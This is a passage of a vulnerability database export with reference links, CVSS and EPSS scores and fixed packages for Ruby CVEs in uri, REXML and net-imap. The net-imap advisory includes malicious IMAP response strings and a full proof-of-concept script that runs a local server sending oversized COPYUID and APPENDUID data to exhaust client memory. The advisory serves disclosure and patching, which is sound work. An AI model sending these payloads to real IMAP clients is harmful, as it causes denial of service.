reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27221

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/uri/CVE-2025-27221.yml

reference_id

reference_type

scores

value	3.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

value	2.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

value	LOW
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-04T16:38:46Z/

url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/uri/CVE-2025-27221.yml

reference_url

https://github.com/ruby/uri

reference_id

reference_type

scores

value	3.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

value	2.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

value	LOW
scoring_system	generic_textual
scoring_elements

url

https://github.com/ruby/uri

reference_url

https://github.com/ruby/uri/pull/154

reference_id

reference_type

scores

value	3.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

value	2.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

value	LOW
scoring_system	generic_textual
scoring_elements

url

https://github.com/ruby/uri/pull/154

reference_url

https://github.com/ruby/uri/pull/155

reference_id

reference_type

scores

value	3.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

value	2.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

value	LOW
scoring_system	generic_textual
scoring_elements

url

https://github.com/ruby/uri/pull/155

reference_url

https://github.com/ruby/uri/pull/156

reference_id

reference_type

scores

value	3.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

value	2.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

value	LOW
scoring_system	generic_textual
scoring_elements

url

https://github.com/ruby/uri/pull/156

reference_url

https://github.com/ruby/uri/pull/157

reference_id

reference_type

scores

value	3.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

value	2.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

value	LOW
scoring_system	generic_textual
scoring_elements

url

https://github.com/ruby/uri/pull/157

reference_url

https://hackerone.com/reports/2957667

reference_id

reference_type

scores

value	3.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

value	2.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

value	LOW
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-04T16:38:46Z/

url

https://hackerone.com/reports/2957667

reference_url

https://lists.debian.org/debian-lts-announce/2025/03/msg00008.html

reference_id

reference_type

scores

value	3.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

value	2.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

value	LOW
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2025/03/msg00008.html

reference_url

https://lists.debian.org/debian-lts-announce/2025/05/msg00015.html

reference_id

reference_type

scores

value	3.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

value	2.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

value	LOW
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2025/05/msg00015.html

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2025-27221

reference_id

reference_type

scores

value	3.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

value	2.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

value	LOW
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2025-27221

reference_url

https://www.cve.org/CVERecord?id=CVE-2025-27221

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements

value	3.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

value	2.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

value	LOW
scoring_system	generic_textual
scoring_elements

url

https://www.cve.org/CVERecord?id=CVE-2025-27221

reference_url

https://www.ruby-lang.org/en/news/2025/02/26/security-advisories

reference_id

reference_type

scores

value	3.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

value	2.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

value	LOW
scoring_system	generic_textual
scoring_elements

url

https://www.ruby-lang.org/en/news/2025/02/26/security-advisories

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103794
reference_id	1103794
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103794

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2349700
reference_id	2349700
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2349700

reference_url

https://github.com/advisories/GHSA-22h5-pq3x-2gf2

reference_id

GHSA-22h5-pq3x-2gf2

reference_type

scores

value	LOW
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-22h5-pq3x-2gf2

reference_url	https://access.redhat.com/errata/RHSA-2025:10217
reference_id	RHSA-2025:10217
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:10217

reference_url	https://access.redhat.com/errata/RHSA-2025:4063
reference_id	RHSA-2025:4063
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4063

reference_url	https://access.redhat.com/errata/RHSA-2025:4488
reference_id	RHSA-2025:4488
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4488

reference_url	https://access.redhat.com/errata/RHSA-2025:4493
reference_id	RHSA-2025:4493
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4493

reference_url	https://access.redhat.com/errata/RHSA-2025:8131
reference_id	RHSA-2025:8131
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:8131

reference_url	https://usn.ubuntu.com/7418-1/
reference_id	USN-7418-1
reference_type
scores
url	https://usn.ubuntu.com/7418-1/

reference_url	https://usn.ubuntu.com/7442-1/
reference_id	USN-7442-1
reference_type
scores
url	https://usn.ubuntu.com/7442-1/

fixed_packages

url	pkg:deb/debian/ruby3.3@3.3.7-2?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.7-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.7-2%3Fdistro=trixie

url	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.8-2%3Fdistro=trixie

aliases CVE-2025-27221, GHSA-22h5-pq3x-2gf2

risk_score 1.6

exploitability 0.5

weighted_severity 3.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-n1ja-n53g-fycm

url VCID-qu1w-yd76-t7c1

vulnerability_id VCID-qu1w-yd76-t7c1

summary

REXML denial of service vulnerability
### Impact

The REXML gem before 3.3.1 has some DoS vulnerabilities when it parses an XML that has many specific characters such as `<`, `0` and `%>`.

If you need to parse untrusted XMLs, you may be impacted to these vulnerabilities.

### Patches

The REXML gem 3.3.2 or later include the patches to fix these vulnerabilities.

### Workarounds

Don't parse untrusted XMLs.

### References

* https://github.com/ruby/rexml/security/advisories/GHSA-vg3r-rm7w-2xgh : This is a similar vulnerability
* https://www.ruby-lang.org/en/news/2024/07/16/dos-rexml-cve-2024-39908/

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-39908.json

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-39908.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2024-39908

reference_id

reference_type

scores

value	0.06685
scoring_system	epss
scoring_elements	0.91192
published_at	2026-04-02T12:55:00Z

value	0.06685
scoring_system	epss
scoring_elements	0.91261
published_at	2026-04-16T12:55:00Z

value	0.06685
scoring_system	epss
scoring_elements	0.91237
published_at	2026-04-13T12:55:00Z

value	0.06685
scoring_system	epss
scoring_elements	0.91238
published_at	2026-04-12T12:55:00Z

value	0.06685
scoring_system	epss
scoring_elements	0.91234
published_at	2026-04-11T12:55:00Z

value	0.06685
scoring_system	epss
scoring_elements	0.91227
published_at	2026-04-09T12:55:00Z

value	0.06685
scoring_system	epss
scoring_elements	0.91221
published_at	2026-04-08T12:55:00Z

value	0.06685
scoring_system	epss
scoring_elements	0.91207
published_at	2026-04-07T12:55:00Z

value	0.06685
scoring_system	epss
scoring_elements	0.912
published_at	2026-04-04T12:55:00Z

value	0.06685
scoring_system	epss
scoring_elements	0.9126
published_at	2026-04-18T12:55:00Z

value	0.08032
scoring_system	epss
scoring_elements	0.92128
published_at	2026-04-26T12:55:00Z

value	0.08032
scoring_system	epss
scoring_elements	0.92124
published_at	2026-04-21T12:55:00Z

value	0.08032
scoring_system	epss
scoring_elements	0.92126
published_at	2026-04-29T12:55:00Z

value	0.08335
scoring_system	epss
scoring_elements	0.9231
published_at	2026-05-05T12:55:00Z

value	0.08335
scoring_system	epss
scoring_elements	0.9233
published_at	2026-05-11T12:55:00Z

value	0.08335
scoring_system	epss
scoring_elements	0.92337
published_at	2026-05-12T12:55:00Z

value	0.08335
scoring_system	epss
scoring_elements	0.92328
published_at	2026-05-09T12:55:00Z

value	0.08335
scoring_system	epss
scoring_elements	0.9232
published_at	2026-05-07T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2024-39908

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39908
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39908

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ruby/rexml/releases/tag/v3.3.2

reference_url

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ruby/rexml/releases/tag/v3.3.2

reference_url

https://github.com/ruby/rexml/security/advisories/GHSA-4xqq-m2hx-25v8

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv3
scoring_elements

value	4.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:58:11Z/

url

https://github.com/ruby/rexml/security/advisories/GHSA-4xqq-m2hx-25v8

reference_url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2024-39908.yml

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2024-39908.yml

reference_url

https://lists.debian.org/debian-lts-announce/2025/01/msg00011.html

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2025/01/msg00011.html

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2024-39908

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2024-39908

reference_url

https://security.netapp.com/advisory/ntap-20250117-0008

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://security.netapp.com/advisory/ntap-20250117-0008

reference_url

https://www.ruby-lang.org/en/news/2024/07/16/dos-rexml-cve-2024-39908

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:58:11Z/

url

https://www.ruby-lang.org/en/news/2024/07/16/dos-rexml-cve-2024-39908

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1076766
reference_id	1076766
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1076766

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1076768
reference_id	1076768
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1076768

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2298243
reference_id	2298243
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2298243

reference_url

https://github.com/advisories/GHSA-4xqq-m2hx-25v8

reference_id

GHSA-4xqq-m2hx-25v8

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-4xqq-m2hx-25v8

reference_url	https://security.gentoo.org/glsa/202507-08
reference_id	GLSA-202507-08
reference_type
scores
url	https://security.gentoo.org/glsa/202507-08

reference_url	https://access.redhat.com/errata/RHSA-2024:6784
reference_id	RHSA-2024:6784
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6784

reference_url	https://access.redhat.com/errata/RHSA-2024:6785
reference_id	RHSA-2024:6785
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6785

reference_url	https://access.redhat.com/errata/RHSA-2025:4063
reference_id	RHSA-2025:4063
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4063

reference_url	https://access.redhat.com/errata/RHSA-2025:4488
reference_id	RHSA-2025:4488
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4488

reference_url	https://usn.ubuntu.com/7091-1/
reference_id	USN-7091-1
reference_type
scores
url	https://usn.ubuntu.com/7091-1/

reference_url	https://usn.ubuntu.com/7256-1/
reference_id	USN-7256-1
reference_type
scores
url	https://usn.ubuntu.com/7256-1/

reference_url	https://usn.ubuntu.com/7418-1/
reference_id	USN-7418-1
reference_type
scores
url	https://usn.ubuntu.com/7418-1/

reference_url	https://usn.ubuntu.com/7840-1/
reference_id	USN-7840-1
reference_type
scores
url	https://usn.ubuntu.com/7840-1/

fixed_packages

url	pkg:deb/debian/ruby3.3@3.3.5-1?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.5-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.5-1%3Fdistro=trixie

url	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.8-2%3Fdistro=trixie

aliases CVE-2024-39908, GHSA-4xqq-m2hx-25v8

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qu1w-yd76-t7c1

url VCID-wyjh-cuuy-zbeb

vulnerability_id VCID-wyjh-cuuy-zbeb

summary

Possible DoS by memory exhaustion in net-imap
### Summary
There is a possibility for denial of service by memory exhaustion in `net-imap`'s response parser.  At any time while the client is connected, a malicious server can send  can send highly compressed `uid-set` data which is automatically read by the client's receiver thread.  The response parser uses `Range#to_a` to convert the `uid-set` data into arrays of integers, with no limitation on the expanded size of the ranges.

### Details
IMAP's `uid-set` and `sequence-set` formats can compress ranges of numbers, for example: `"1,2,3,4,5"` and `"1:5"` both represent the same set.  When `Net::IMAP::ResponseParser` receives `APPENDUID` or `COPYUID` response codes, it expands each `uid-set` into an array of integers.  On a 64 bit system, these arrays will expand to 8 bytes for each number in the set.  A malicious IMAP server may send specially crafted `APPENDUID` or `COPYUID` responses with very large `uid-set` ranges.

The `Net::IMAP` client parses each server response in a separate thread, as soon as each responses is received from the server.  This attack works even when the client does not handle the `APPENDUID` or `COPYUID` responses.

Malicious inputs:

```ruby
# 40 bytes expands to ~1.6GB:
"* OK [COPYUID 1 1:99999999 1:99999999]\r\n"

# Worst *valid* input scenario (using uint32 max),
# 44 bytes expands to 64GiB:
"* OK [COPYUID 1 1:4294967295 1:4294967295]\r\n"

# Numbers must be non-zero uint32, but this isn't validated.  Arrays larger than
# UINT32_MAX can be created.  For example, the following would theoretically
# expand to almost 800 exabytes:
"* OK [COPYUID 1 1:99999999999999999999 1:99999999999999999999]\r\n"
```

Simple way to test this:
```ruby
require "net/imap"

def test(size)
  input = "A004 OK [COPYUID 1 1:#{size} 1:#{size}] too large?\r\n"
  parser = Net::IMAP::ResponseParser.new
  parser.parse input
end

test(99_999_999)
```

### Fixes

#### Preferred Fix, minor API changes
Upgrade to v0.4.19, v0.5.6, or higher, and configure:
```ruby
# globally
Net::IMAP.config.parser_use_deprecated_uidplus_data = false
# per-client
imap = Net::IMAP.new(hostname, ssl: true,
                               parser_use_deprecated_uidplus_data: false)
imap.config.parser_use_deprecated_uidplus_data = false
```

This replaces `UIDPlusData` with `AppendUIDData` and `CopyUIDData`.  These classes store their UIDs as `Net::IMAP::SequenceSet` objects (_not_ expanded into arrays of integers).  Code that does not handle `APPENDUID` or `COPYUID` responses will not notice any difference.  Code that does handle these responses _may_ need to be updated.  See the documentation for [UIDPlusData](https://ruby.github.io/net-imap/Net/IMAP/UIDPlusData.html), [AppendUIDData](https://ruby.github.io/net-imap/Net/IMAP/AppendUIDData.html) and [CopyUIDData](https://ruby.github.io/net-imap/Net/IMAP/CopyUIDData.html).

For v0.3.8, this option is not available.
For v0.4.19, the default value is `true`.
For v0.5.6, the default value is `:up_to_max_size`.
For v0.6.0, the only allowed value will be `false`  _(`UIDPlusData` will be removed from v0.6)_.

#### Mitigation, backward compatible API
Upgrade to v0.3.8, v0.4.19, v0.5.6, or higher.

For backward compatibility, `uid-set` can still be expanded into an array, but a maximum limit will be applied.

Assign `config.parser_max_deprecated_uidplus_data_size` to set the maximum `UIDPlusData` UID set size.
When `config.parser_use_deprecated_uidplus_data == true`, larger sets will raise `Net::IMAP::ResponseParseError`.
When  `config.parser_use_deprecated_uidplus_data == :up_to_max_size`, larger sets will use `AppendUIDData` or `CopyUIDData`.

For v0.3,8, this limit is _hard-coded_ to 10,000, and larger sets will always raise `Net::IMAP::ResponseParseError`.
For v0.4.19, the limit defaults to 1000.
For v0.5.6, the limit defaults to 100.
For v0.6.0, the limit will be ignored  _(`UIDPlusData` will be removed from v0.6)_.

#### Please Note: unhandled responses
If the client does not add response handlers to prune unhandled responses, a malicious server can still eventually exhaust all client memory, by repeatedly sending malicious responses.  However, `net-imap` has always retained unhandled responses, and it has always been necessary for long-lived connections to prune these responses.  _This is not significantly different from connecting to a trusted server with a long-lived connection._  To limit the maximum number of retained responses, a simple handler might look something like the following:

  ```ruby
  limit = 1000
  imap.add_response_handler do |resp|
    next unless resp.respond_to?(:name) && resp.respond_to?(:data)
    name = resp.name
    code = resp.data.code&.name if resp.data.respond_to?(:code)
    if Net::IMAP::VERSION > "0.4.0"
      imap.responses(name) { _1.slice!(0...-limit) }
      imap.responses(code) { _1.slice!(0...-limit) }
    else
      imap.responses(name).slice!(0...-limit)
      imap.responses(code).slice!(0...-limit)
    end
  end
  ```

### Proof of concept

Save the following to a ruby file (e.g: `poc.rb`) and make it executable:
```ruby
#!/usr/bin/env ruby
require 'socket'
require 'net/imap'

if !defined?(Net::IMAP.config)
  puts "Net::IMAP.config is not available"
elsif !Net::IMAP.config.respond_to?(:parser_use_deprecated_uidplus_data)
  puts "Net::IMAP.config.parser_use_deprecated_uidplus_data is not available"
else
  Net::IMAP.config.parser_use_deprecated_uidplus_data = :up_to_max_size
  puts "Updated parser_use_deprecated_uidplus_data to :up_to_max_size"
end

size = Integer(ENV["UID_SET_SIZE"] || 2**32-1)

def server_addr
  Addrinfo.tcp("localhost", 0).ip_address
end

def create_tcp_server
  TCPServer.new(server_addr, 0)
end

def start_server
  th = Thread.new do
    yield
  end
  sleep 0.1 until th.stop?
end

def copyuid_response(tag: "*", size: 2**32-1, text: "too large?")
  "#{tag} OK [COPYUID 1 1:#{size} 1:#{size}] #{text}\r\n"
end

def appenduid_response(tag: "*", size: 2**32-1, text: "too large?")
  "#{tag} OK [APPENDUID 1 1:#{size}] #{text}\r\n"
end

server = create_tcp_server
port = server.addr[1]
puts "Server started on port #{port}"

# server
start_server do
  sock = server.accept
  begin
    sock.print "* OK test server\r\n"
    cmd = sock.gets("\r\n", chomp: true)
    tag = cmd.match(/\A(\w+) /)[1]
    puts "Received: #{cmd}"

    malicious_response = appenduid_response(size:)
    puts "Sending: #{malicious_response.chomp}"
    sock.print malicious_response

    malicious_response = copyuid_response(size:)
    puts "Sending: #{malicious_response.chomp}"
    sock.print malicious_response
    sock.print "* CAPABILITY JUMBO=UIDPLUS PROOF_OF_CONCEPT\r\n"
    sock.print "#{tag} OK CAPABILITY completed\r\n"

    cmd = sock.gets("\r\n", chomp: true)
    tag = cmd.match(/\A(\w+) /)[1]
    puts "Received: #{cmd}"
    sock.print "* BYE If you made it this far, you passed the test!\r\n"
    sock.print "#{tag} OK LOGOUT completed\r\n"
  rescue Exception => ex
    puts "Error in server: #{ex.message} (#{ex.class})"
  ensure
    sock.close
    server.close
  end
end

# client
begin
  puts "Client connecting,.."
  imap = Net::IMAP.new(server_addr, port: port)
  puts "Received capabilities: #{imap.capability}"
  pp responses: imap.responses
  imap.logout
rescue Exception => ex
  puts "Error in client: #{ex.message} (#{ex.class})"
  puts ex.full_message
ensure
  imap.disconnect if imap
end
```

Use `ulimit` to limit the process's virtual memory.  The following example limits virtual memory to 1GB:
```console
$ ( ulimit -v 1000000 && exec ./poc.rb )
Server started on port 34291
Client connecting,..
Received: RUBY0001 CAPABILITY
Sending: * OK [APPENDUID 1 1:4294967295] too large?
Sending: * OK [COPYUID 1 1:4294967295 1:4294967295] too large?
Error in server: Connection reset by peer @ io_fillbuf - fd:9  (Errno::ECONNRESET)
Error in client: failed to allocate memory (NoMemoryError)
/gems/net-imap-0.5.5/lib/net/imap.rb:3271:in 'Net::IMAP#get_tagged_response': failed to allocate memory (NoMemoryError)
        from /gems/net-imap-0.5.5/lib/net/imap.rb:3371:in 'block in Net::IMAP#send_command'
        from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize'
        from /rubylibdir/monitor.rb:201:in 'MonitorMixin#mon_synchronize'
        from /gems/net-imap-0.5.5/lib/net/imap.rb:3353:in 'Net::IMAP#send_command'
        from /gems/net-imap-0.5.5/lib/net/imap.rb:1128:in 'block in Net::IMAP#capability'
        from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize'
        from /rubylibdir/monitor.rb:201:in 'MonitorMixin#mon_synchronize'
        from /gems/net-imap-0.5.5/lib/net/imap.rb:1127:in 'Net::IMAP#capability'
        from /workspace/poc.rb:70:in '<main>'
```

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-25186.json

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-25186.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2025-25186

reference_id

reference_type

scores

value	0.00135
scoring_system	epss
scoring_elements	0.32872
published_at	2026-05-12T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.32846
published_at	2026-05-11T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.32936
published_at	2026-05-09T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.32897
published_at	2026-05-07T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.32828
published_at	2026-05-05T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.3294
published_at	2026-04-29T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.33317
published_at	2026-04-02T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.33016
published_at	2026-04-26T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.33033
published_at	2026-04-24T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.33179
published_at	2026-04-21T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.33215
published_at	2026-04-18T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.33238
published_at	2026-04-16T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.33199
published_at	2026-04-13T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.33222
published_at	2026-04-12T12:55:00Z

value	0.00135
